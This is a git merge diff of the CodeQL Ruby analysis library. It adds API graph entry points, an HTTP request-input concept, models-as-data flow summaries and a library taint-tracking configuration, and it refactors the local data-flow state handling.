Merge branch 'main' into shared-concepts-scaffolding

2026-04-30 19:26:02 +02:00 · 2022-03-22 10:36:33 +01:00
parent 414764ccee ea065b7d8a
commit 311cbb4e13
190 changed files with 13626 additions and 1805 deletions
--- a/ruby/ql/lib/codeql/ruby/ApiGraphs.qll
+++ b/ruby/ql/lib/codeql/ruby/ApiGraphs.qll
@@ -266,6 +266,41 @@ module API {
  /** A node corresponding to the method being invoked at a method call. */
  class MethodAccessNode extends Node, Impl::MkMethodAccessNode {
    override string toString() { result = "MethodAccessNode " + tryGetPath(this) }
+
+    /** Gets the call node corresponding to this method access. */
+    DataFlow::CallNode getCallNode() { this = Impl::MkMethodAccessNode(result) }
+  }
+
+  /**
+   * An API entry point.
+   *
+   * By default, API graph nodes are only created for nodes that come from an external
+   * library or escape into an external library. The points where values are cross the boundary
+   * between codebases are called "entry points".
+   *
+   * Anything in the global scope is considered to be an entry point, but
+   * additional entry points may be added by extending this class.
+   */
+  abstract class EntryPoint extends string {
+    bindingset[this]
+    EntryPoint() { any() }
+
+    /** Gets a data-flow node corresponding to a use-node for this entry point. */
+    DataFlow::LocalSourceNode getAUse() { none() }
+
+    /** Gets a data-flow node corresponding to a def-node for this entry point. */
+    DataFlow::Node getARhs() { none() }
+
+    /** Gets a call corresponding to a method access node for this entry point. */
+    DataFlow::CallNode getACall() { none() }
+
+    /** Gets an API-node for this entry point. */
+    API::Node getANode() { result = root().getASuccessor(Label::entryPoint(this)) }
+  }
+
+  // Ensure all entry points are imported from ApiGraphs.qll
+  private module ImportEntryPoints {
+    private import codeql.ruby.frameworks.data.ModelsAsData
  }

  /** Gets the root node. */
@@ -324,7 +359,7 @@ module API {

    /**
     * Holds if `ref` is a use of a node that should have an incoming edge from the root
-     * node labeled `lbl` in the API graph.
+     * node labeled `lbl` in the API graph (not including those from API::EntryPoint).
     */
    pragma[nomagic]
    private predicate useRoot(Label::ApiLabel lbl, DataFlow::Node ref) {
@@ -371,6 +406,10 @@ module API {
      useCandFwd().flowsTo(nd.(DataFlow::CallNode).getReceiver())
      or
      parameterStep(_, defCand(), nd)
+      or
+      nd = any(EntryPoint entry).getAUse()
+      or
+      nd = any(EntryPoint entry).getACall()
    }

    /**
@@ -416,6 +455,8 @@ module API {
    private predicate isDef(DataFlow::Node rhs) {
      // If a call node is relevant as a use-node, treat its arguments as def-nodes
      argumentStep(_, useCandFwd(), rhs)
+      or
+      rhs = any(EntryPoint entry).getARhs()
    }

    /** Gets a data flow node that flows to the RHS of a def-node. */
@@ -590,6 +631,17 @@ module API {
          )
        )
      )
+      or
+      exists(EntryPoint entry |
+        pred = root() and
+        lbl = Label::entryPoint(entry)
+      |
+        succ = MkDef(entry.getARhs())
+        or
+        succ = MkUse(entry.getAUse())
+        or
+        succ = MkMethodAccessNode(entry.getACall())
+      )
    }

    /**
@@ -619,7 +671,8 @@ module API {
        or
        any(DataFlowDispatch::ParameterPosition c).isPositional(n)
      } or
-      MkLabelBlockParameter()
+      MkLabelBlockParameter() or
+      MkLabelEntryPoint(EntryPoint name)
  }

  /** Provides classes modeling the various edges (labels) in the API graph. */
@@ -710,6 +763,18 @@ module API {

        override string toString() { result = "getBlock()" }
      }
+
+      /** A label from the root node to a custom entry point. */
+      class LabelEntryPoint extends ApiLabel {
+        private API::EntryPoint name;
+
+        LabelEntryPoint() { this = MkLabelEntryPoint(name) }
+
+        override string toString() { result = name }
+
+        /** Gets the name of the entry point. */
+        API::EntryPoint getName() { result = name }
+      }
    }

    /** Gets the `member` edge label for member `m`. */
@@ -735,5 +800,8 @@ module API {

    /** Gets the label representing the block argument/parameter. */
    LabelBlockParameter blockParameter() { any() }
+
+    /** Gets the label for the edge from the root node to a custom entry point of the given name. */
+    LabelEntryPoint entryPoint(API::EntryPoint name) { result.getName() = name }
  }
 }
--- a/ruby/ql/lib/codeql/ruby/Concepts.qll
+++ b/ruby/ql/lib/codeql/ruby/Concepts.qll
@@ -290,6 +290,44 @@ module HTTP {
      }
    }

+    /**
+     * An access to a user-controlled HTTP request input. For example, the URL or body of a request.
+     * Instances of this class automatically become `RemoteFlowSource`s.
+     *
+     * Extend this class to refine existing API models. If you want to model new APIs,
+     * extend `RequestInputAccess::Range` instead.
+     */
+    class RequestInputAccess extends DataFlow::Node instanceof RequestInputAccess::Range {
+      /**
+       * Gets a string that describes the type of this input.
+       *
+       * This is typically the name of the method that gives rise to this input.
+       */
+      string getSourceType() { result = super.getSourceType() }
+    }
+
+    /** Provides a class for modeling new HTTP request inputs. */
+    module RequestInputAccess {
+      /**
+       * An access to a user-controlled HTTP request input.
+       *
+       * Extend this class to model new APIs. If you want to refine existing API models,
+       * extend `RequestInputAccess` instead.
+       */
+      abstract class Range extends DataFlow::Node {
+        /**
+         * Gets a string that describes the type of this input.
+         *
+         * This is typically the name of the method that gives rise to this input.
+         */
+        abstract string getSourceType();
+      }
+    }
+
+    private class RequestInputAccessAsRemoteFlowSource extends RemoteFlowSource::Range instanceof RequestInputAccess {
+      override string getSourceType() { result = this.(RequestInputAccess).getSourceType() }
+    }
+
    /**
     * A function that will handle incoming HTTP requests.
     *
@@ -343,7 +381,7 @@ module HTTP {
    }

    /** A parameter that will receive parts of the url when handling an incoming request. */
-    private class RoutedParameter extends RemoteFlowSource::Range, DataFlow::ParameterNode {
+    private class RoutedParameter extends RequestInputAccess::Range, DataFlow::ParameterNode {
      RequestHandler handler;

      RoutedParameter() { this.getParameter() = handler.getARoutedParameter() }
--- a/ruby/ql/lib/codeql/ruby/controlflow/CfgNodes.qll
+++ b/ruby/ql/lib/codeql/ruby/controlflow/CfgNodes.qll
@@ -794,6 +794,20 @@ module ExprNodes {
    final override VariableWriteAccess getExpr() { result = ExprCfgNode.super.getExpr() }
  }

+  /** A control-flow node that wraps a `ConstantReadAccess` AST expression. */
+  class ConstantReadAccessCfgNode extends ExprCfgNode {
+    override ConstantReadAccess e;
+
+    final override ConstantReadAccess getExpr() { result = ExprCfgNode.super.getExpr() }
+  }
+
+  /** A control-flow node that wraps a `ConstantWriteAccess` AST expression. */
+  class ConstantWriteAccessCfgNode extends ExprCfgNode {
+    override ConstantWriteAccess e;
+
+    final override ConstantWriteAccess getExpr() { result = ExprCfgNode.super.getExpr() }
+  }
+
  /** A control-flow node that wraps a `InstanceVariableWriteAccess` AST expression. */
  class InstanceVariableWriteAccessCfgNode extends ExprCfgNode {
    override InstanceVariableWriteAccess e;
--- a/ruby/ql/lib/codeql/ruby/dataflow/FlowSummary.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/FlowSummary.qll
@@ -2,6 +2,8 @@

 import ruby
 import codeql.ruby.DataFlow
+private import codeql.ruby.frameworks.data.ModelsAsData
+private import codeql.ruby.ApiGraphs
 private import internal.FlowSummaryImpl as Impl
 private import internal.DataFlowDispatch
 private import internal.DataFlowPrivate
@@ -165,3 +167,33 @@ private class SummarizedCallableAdapter extends Impl::Public::SummarizedCallable
 }

 class RequiredSummaryComponentStack = Impl::Public::RequiredSummaryComponentStack;
+
+private class SummarizedCallableFromModel extends SummarizedCallable {
+  string package;
+  string type;
+  string path;
+
+  SummarizedCallableFromModel() {
+    ModelOutput::relevantSummaryModel(package, type, path, _, _, _) and
+    this = package + ";" + type + ";" + path
+  }
+
+  override Call getACall() {
+    exists(API::MethodAccessNode base |
+      ModelOutput::resolvedSummaryBase(package, type, path, base) and
+      result = base.getCallNode().asExpr().getExpr()
+    )
+  }
+
+  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
+    exists(string kind |
+      ModelOutput::relevantSummaryModel(package, type, path, input, output, kind)
+    |
+      kind = "value" and
+      preservesValue = true
+      or
+      kind = "taint" and
+      preservesValue = false
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl.qll
@@ -1756,18 +1756,31 @@ private module LocalFlowBigStep {
   * Holds if `node` can be the first node in a maximal subsequence of local
   * flow steps in a dataflow path.
   */
-  predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
+  private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
    Stage2::revFlow(node, state, config) and
    (
-      sourceNode(node, state, config) or
-      jumpStep(_, node, config) or
-      additionalJumpStep(_, node, config) or
-      additionalJumpStateStep(_, _, node, state, config) or
-      node instanceof ParamNodeEx or
-      node.asNode() instanceof OutNodeExt or
-      store(_, _, node, _, config) or
-      read(_, _, node, config) or
+      sourceNode(node, state, config)
+      or
+      jumpStep(_, node, config)
+      or
+      additionalJumpStep(_, node, config)
+      or
+      additionalJumpStateStep(_, _, node, state, config)
+      or
+      node instanceof ParamNodeEx
+      or
+      node.asNode() instanceof OutNodeExt
+      or
+      store(_, _, node, _, config)
+      or
+      read(_, _, node, config)
+      or
      node instanceof FlowCheckNode
+      or
+      exists(FlowState s |
+        additionalLocalStateStep(_, s, node, state, config) and
+        s != state
+      )
    )
  }

@@ -1787,6 +1800,9 @@ private module LocalFlowBigStep {
    or
    exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
      additionalJumpStateStep(node, state, next, s, config)
+      or
+      additionalLocalStateStep(node, state, next, s, config) and
+      s != state
    )
    or
    Stage2::revFlow(node, state, config) and
@@ -1820,42 +1836,40 @@ private module LocalFlowBigStep {
   */
  pragma[nomagic]
  private predicate localFlowStepPlus(
-    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
-    DataFlowType t, Configuration config, LocalCallContext cc
+    NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
+    Configuration config, LocalCallContext cc
  ) {
    not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
    (
-      localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
+      localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
      (
        localFlowStepNodeCand1(node1, node2, config) and
-        state1 = state2 and
        preservesValue = true and
-        t = node1.getDataFlowType() // irrelevant dummy value
+        t = node1.getDataFlowType() and // irrelevant dummy value
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
        or
-        additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+        additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
        preservesValue = false and
        t = node2.getDataFlowType()
      ) and
      node1 != node2 and
      cc.relevantFor(node1.getEnclosingCallable()) and
-      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
-      Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
      or
      exists(NodeEx mid |
-        localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
+        localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
          pragma[only_bind_into](config), cc) and
        localFlowStepNodeCand1(mid, node2, config) and
        not mid instanceof FlowCheckNode and
-        Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
      )
      or
-      exists(NodeEx mid, FlowState st |
-        localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
-        additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
+      exists(NodeEx mid |
+        localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
+        additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
        not mid instanceof FlowCheckNode and
        preservesValue = false and
-        t = node2.getDataFlowType() and
-        Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
+        t = node2.getDataFlowType()
      )
    )
  }
@@ -1869,9 +1883,19 @@ private module LocalFlowBigStep {
    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
    AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
  ) {
-    localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
-      callContext) and
-    localFlowExit(node2, state2, config)
+    localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
+    localFlowExit(node2, state1, config) and
+    state1 = state2
+    or
+    additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+    state1 != state2 and
+    preservesValue = false and
+    apf = TFrontNil(node2.getDataFlowType()) and
+    callContext.relevantFor(node1.getEnclosingCallable()) and
+    not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
+      isUnreachableInCallCached(node1.asNode(), call) or
+      isUnreachableInCallCached(node2.asNode(), call)
+    )
  }
 }

@@ -2745,10 +2769,10 @@ private module Stage4 {

  bindingset[node, cc, config]
  private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
-    localFlowEntry(node, _, config) and
    result =
      getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
-        node.getEnclosingCallable())
+        node.getEnclosingCallable()) and
+    exists(config)
  }

  private predicate localStep(
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl2.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl2.qll
@@ -1756,18 +1756,31 @@ private module LocalFlowBigStep {
   * Holds if `node` can be the first node in a maximal subsequence of local
   * flow steps in a dataflow path.
   */
-  predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
+  private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
    Stage2::revFlow(node, state, config) and
    (
-      sourceNode(node, state, config) or
-      jumpStep(_, node, config) or
-      additionalJumpStep(_, node, config) or
-      additionalJumpStateStep(_, _, node, state, config) or
-      node instanceof ParamNodeEx or
-      node.asNode() instanceof OutNodeExt or
-      store(_, _, node, _, config) or
-      read(_, _, node, config) or
+      sourceNode(node, state, config)
+      or
+      jumpStep(_, node, config)
+      or
+      additionalJumpStep(_, node, config)
+      or
+      additionalJumpStateStep(_, _, node, state, config)
+      or
+      node instanceof ParamNodeEx
+      or
+      node.asNode() instanceof OutNodeExt
+      or
+      store(_, _, node, _, config)
+      or
+      read(_, _, node, config)
+      or
      node instanceof FlowCheckNode
+      or
+      exists(FlowState s |
+        additionalLocalStateStep(_, s, node, state, config) and
+        s != state
+      )
    )
  }

@@ -1787,6 +1800,9 @@ private module LocalFlowBigStep {
    or
    exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
      additionalJumpStateStep(node, state, next, s, config)
+      or
+      additionalLocalStateStep(node, state, next, s, config) and
+      s != state
    )
    or
    Stage2::revFlow(node, state, config) and
@@ -1820,42 +1836,40 @@ private module LocalFlowBigStep {
   */
  pragma[nomagic]
  private predicate localFlowStepPlus(
-    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
-    DataFlowType t, Configuration config, LocalCallContext cc
+    NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
+    Configuration config, LocalCallContext cc
  ) {
    not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
    (
-      localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
+      localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
      (
        localFlowStepNodeCand1(node1, node2, config) and
-        state1 = state2 and
        preservesValue = true and
-        t = node1.getDataFlowType() // irrelevant dummy value
+        t = node1.getDataFlowType() and // irrelevant dummy value
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
        or
-        additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+        additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
        preservesValue = false and
        t = node2.getDataFlowType()
      ) and
      node1 != node2 and
      cc.relevantFor(node1.getEnclosingCallable()) and
-      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
-      Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
      or
      exists(NodeEx mid |
-        localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
+        localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
          pragma[only_bind_into](config), cc) and
        localFlowStepNodeCand1(mid, node2, config) and
        not mid instanceof FlowCheckNode and
-        Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
      )
      or
-      exists(NodeEx mid, FlowState st |
-        localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
-        additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
+      exists(NodeEx mid |
+        localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
+        additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
        not mid instanceof FlowCheckNode and
        preservesValue = false and
-        t = node2.getDataFlowType() and
-        Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
+        t = node2.getDataFlowType()
      )
    )
  }
@@ -1869,9 +1883,19 @@ private module LocalFlowBigStep {
    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
    AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
  ) {
-    localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
-      callContext) and
-    localFlowExit(node2, state2, config)
+    localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
+    localFlowExit(node2, state1, config) and
+    state1 = state2
+    or
+    additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+    state1 != state2 and
+    preservesValue = false and
+    apf = TFrontNil(node2.getDataFlowType()) and
+    callContext.relevantFor(node1.getEnclosingCallable()) and
+    not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
+      isUnreachableInCallCached(node1.asNode(), call) or
+      isUnreachableInCallCached(node2.asNode(), call)
+    )
  }
 }

@@ -2745,10 +2769,10 @@ private module Stage4 {

  bindingset[node, cc, config]
  private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
-    localFlowEntry(node, _, config) and
    result =
      getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
-        node.getEnclosingCallable())
+        node.getEnclosingCallable()) and
+    exists(config)
  }

  private predicate localStep(
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImplForLibraries.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImplForLibraries.qll
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingImpl.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingImpl.qll
@@ -0,0 +1,198 @@
+/**
+ * Provides an implementation of global (interprocedural) taint tracking.
+ * This file re-exports the local (intraprocedural) taint-tracking analysis
+ * from `TaintTrackingParameter::Public` and adds a global analysis, mainly
+ * exposed through the `Configuration` class. For some languages, this file
+ * exists in several identical copies, allowing queries to use multiple
+ * `Configuration` classes that depend on each other without introducing
+ * mutual recursion among those configurations.
+ */
+
+import TaintTrackingParameter::Public
+private import TaintTrackingParameter::Private
+
+/**
+ * A configuration of interprocedural taint tracking analysis. This defines
+ * sources, sinks, and any other configurable aspect of the analysis. Each
+ * use of the taint tracking library must define its own unique extension of
+ * this abstract class.
+ *
+ * A taint-tracking configuration is a special data flow configuration
+ * (`DataFlow::Configuration`) that allows for flow through nodes that do not
+ * necessarily preserve values but are still relevant from a taint tracking
+ * perspective. (For example, string concatenation, where one of the operands
+ * is tainted.)
+ *
+ * To create a configuration, extend this class with a subclass whose
+ * characteristic predicate is a unique singleton string. For example, write
+ *
+ * ```ql
+ * class MyAnalysisConfiguration extends TaintTracking::Configuration {
+ *   MyAnalysisConfiguration() { this = "MyAnalysisConfiguration" }
+ *   // Override `isSource` and `isSink`.
+ *   // Optionally override `isSanitizer`.
+ *   // Optionally override `isSanitizerIn`.
+ *   // Optionally override `isSanitizerOut`.
+ *   // Optionally override `isSanitizerGuard`.
+ *   // Optionally override `isAdditionalTaintStep`.
+ * }
+ * ```
+ *
+ * Then, to query whether there is flow between some `source` and `sink`,
+ * write
+ *
+ * ```ql
+ * exists(MyAnalysisConfiguration cfg | cfg.hasFlow(source, sink))
+ * ```
+ *
+ * Multiple configurations can coexist, but it is unsupported to depend on
+ * another `TaintTracking::Configuration` or a `DataFlow::Configuration` in the
+ * overridden predicates that define sources, sinks, or additional steps.
+ * Instead, the dependency should go to a `TaintTracking2::Configuration` or a
+ * `DataFlow2::Configuration`, `DataFlow3::Configuration`, etc.
+ */
+abstract class Configuration extends DataFlow::Configuration {
+  bindingset[this]
+  Configuration() { any() }
+
+  /**
+   * Holds if `source` is a relevant taint source.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSource(DataFlow::Node source) { none() }
+
+  /**
+   * Holds if `source` is a relevant taint source with the given initial
+   * `state`.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
+
+  /**
+   * Holds if `sink` is a relevant taint sink
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSink(DataFlow::Node sink) { none() }
+
+  /**
+   * Holds if `sink` is a relevant taint sink accepting `state`.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
+
+  /** Holds if the node `node` is a taint sanitizer. */
+  predicate isSanitizer(DataFlow::Node node) { none() }
+
+  final override predicate isBarrier(DataFlow::Node node) {
+    this.isSanitizer(node) or
+    defaultTaintSanitizer(node)
+  }
+
+  /**
+   * Holds if the node `node` is a taint sanitizer when the flow state is
+   * `state`.
+   */
+  predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizer(node, state)
+  }
+
+  /** Holds if taint propagation into `node` is prohibited. */
+  predicate isSanitizerIn(DataFlow::Node node) { none() }
+
+  /**
+   * Holds if taint propagation into `node` is prohibited when the flow state is
+   * `state`.
+   */
+  predicate isSanitizerIn(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierIn(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizerIn(node, state)
+  }
+
+  final override predicate isBarrierIn(DataFlow::Node node) { this.isSanitizerIn(node) }
+
+  /** Holds if taint propagation out of `node` is prohibited. */
+  predicate isSanitizerOut(DataFlow::Node node) { none() }
+
+  final override predicate isBarrierOut(DataFlow::Node node) { this.isSanitizerOut(node) }
+
+  /**
+   * Holds if taint propagation out of `node` is prohibited when the flow state is
+   * `state`.
+   */
+  predicate isSanitizerOut(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierOut(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizerOut(node, state)
+  }
+
+  /** Holds if taint propagation through nodes guarded by `guard` is prohibited. */
+  predicate isSanitizerGuard(DataFlow::BarrierGuard guard) { none() }
+
+  final override predicate isBarrierGuard(DataFlow::BarrierGuard guard) {
+    this.isSanitizerGuard(guard) or defaultTaintSanitizerGuard(guard)
+  }
+
+  /**
+   * Holds if taint propagation through nodes guarded by `guard` is prohibited
+   * when the flow state is `state`.
+   */
+  predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
+    this.isSanitizerGuard(guard, state)
+  }
+
+  /**
+   * Holds if the additional taint propagation step from `node1` to `node2`
+   * must be taken into account in the analysis.
+   */
+  predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
+
+  final override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) {
+    this.isAdditionalTaintStep(node1, node2) or
+    defaultAdditionalTaintStep(node1, node2)
+  }
+
+  /**
+   * Holds if the additional taint propagation step from `node1` to `node2`
+   * must be taken into account in the analysis. This step is only applicable
+   * in `state1` and updates the flow state to `state2`.
+   */
+  predicate isAdditionalTaintStep(
+    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
+    DataFlow::FlowState state2
+  ) {
+    none()
+  }
+
+  final override predicate isAdditionalFlowStep(
+    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
+    DataFlow::FlowState state2
+  ) {
+    this.isAdditionalTaintStep(node1, state1, node2, state2)
+  }
+
+  override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
+    (this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
+    defaultImplicitTaintRead(node, c)
+  }
+
+  /**
+   * Holds if taint may flow from `source` to `sink` for this configuration.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate hasFlow(DataFlow::Node source, DataFlow::Node sink) {
+    super.hasFlow(source, sink)
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingParameter.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingParameter.qll
@@ -0,0 +1,6 @@
+import codeql.ruby.dataflow.internal.TaintTrackingPublic as Public
+
+module Private {
+  import codeql.ruby.dataflow.internal.DataFlowImplForLibraries as DataFlow
+  import codeql.ruby.dataflow.internal.TaintTrackingPrivate
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
@@ -11,6 +11,7 @@ private import codeql.ruby.ast.internal.Module
 private import codeql.ruby.ApiGraphs
 private import ActionView
 private import codeql.ruby.frameworks.ActionDispatch
+private import codeql.ruby.Concepts

 /**
 * A `ClassDeclaration` for a class that extends `ActionController::Base`.
@@ -126,7 +127,7 @@ abstract class ParamsCall extends MethodCall {
 * A `RemoteFlowSource::Range` to represent accessing the
 * ActionController parameters available via the `params` method.
 */
-class ParamsSource extends RemoteFlowSource::Range {
+class ParamsSource extends HTTP::Server::RequestInputAccess::Range {
  ParamsSource() { this.asExpr().getExpr() instanceof ParamsCall }

  override string getSourceType() { result = "ActionController::Metal#params" }
@@ -143,7 +144,7 @@ abstract class CookiesCall extends MethodCall {
 * A `RemoteFlowSource::Range` to represent accessing the
 * ActionController parameters available via the `cookies` method.
 */
-class CookiesSource extends RemoteFlowSource::Range {
+class CookiesSource extends HTTP::Server::RequestInputAccess::Range {
  CookiesSource() { this.asExpr().getExpr() instanceof CookiesCall }

  override string getSourceType() { result = "ActionController::Metal#cookies" }
--- a/ruby/ql/lib/codeql/ruby/frameworks/ActiveStorage.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/ActiveStorage.qll
@@ -7,6 +7,7 @@ private import codeql.ruby.ApiGraphs
 private import codeql.ruby.Concepts
 private import codeql.ruby.DataFlow
 private import codeql.ruby.dataflow.FlowSummary
+private import codeql.ruby.frameworks.data.ModelsAsData

 /** A call to `ActiveStorage::Filename#sanitized`, considered as a path sanitizer. */
 class ActiveStorageFilenameSanitizedCall extends Path::PathSanitization::Range, DataFlow::CallNode {
@@ -17,43 +18,13 @@ class ActiveStorageFilenameSanitizedCall extends Path::PathSanitization::Range,
  }
 }

-/** The taint summary for `ActiveStorage::Filename.new`. */
-class ActiveStorageFilenameNewSummary extends SummarizedCallable {
-  ActiveStorageFilenameNewSummary() { this = "ActiveStorage::Filename.new" }
-
-  override MethodCall getACall() {
-    result =
-      API::getTopLevelMember("ActiveStorage")
-          .getMember("Filename")
-          .getAnInstantiation()
-          .asExpr()
-          .getExpr()
-  }
-
-  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-    input = "Argument[0]" and
-    output = "ReturnValue" and
-    preservesValue = false
-  }
-}
-
-/** The taint summary for `ActiveStorage::Filename#sanitized`. */
-class ActiveStorageFilenameSanitizedSummary extends SummarizedCallable {
-  ActiveStorageFilenameSanitizedSummary() { this = "ActiveStorage::Filename#sanitized" }
-
-  override MethodCall getACall() {
-    result =
-      API::getTopLevelMember("ActiveStorage")
-          .getMember("Filename")
-          .getInstance()
-          .getAMethodCall("sanitized")
-          .asExpr()
-          .getExpr()
-  }
-
-  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-    input = "Argument[-1]" and
-    output = "ReturnValue" and
-    preservesValue = false
+/** Taint related to `ActiveStorage::Filename`. */
+private class Summaries extends ModelInput::SummaryModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "activestorage;;Member[ActiveStorage].Member[Filename].Method[new];Argument[0];ReturnValue;taint",
+        "activestorage;;Member[ActiveStorage].Member[Filename].Instance.Method[sanitized];Receiver;ReturnValue;taint",
+      ]
  }
 }
--- a/ruby/ql/lib/codeql/ruby/frameworks/core/Regexp.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/core/Regexp.qll
@@ -4,24 +4,16 @@

 private import codeql.ruby.ApiGraphs
 private import codeql.ruby.dataflow.FlowSummary
+private import codeql.ruby.frameworks.data.ModelsAsData

 /**
 * Provides modeling for the `Regexp` class.
 */
 module Regexp {
  /** A flow summary for `Regexp.escape` and its alias, `Regexp.quote`. */
